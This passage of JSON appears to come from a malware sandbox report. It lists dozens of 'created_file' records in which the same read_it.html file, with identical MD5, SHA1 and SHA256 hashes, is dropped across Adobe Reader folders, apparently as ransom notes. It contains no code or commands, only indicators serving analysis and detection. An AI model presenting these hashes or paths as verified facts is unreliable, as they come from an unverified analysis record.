7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_354", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_355", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_356", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_357", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_358", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_359", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_360", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_361", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_362", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_363", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_364", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_365", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_366", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_367", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_368", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_369", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_370", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_371", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_372", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_373", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_374", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_375", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_376", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_377", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_378", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_379", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_380", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_381", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_382", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_383", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_384", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_385", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_386", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_387", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_388", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_389", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_390", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_391", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_392", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_393", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_394", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_395", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_396", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_397", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_398", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_399", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_400", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_401", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_402", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_403", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_404", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", 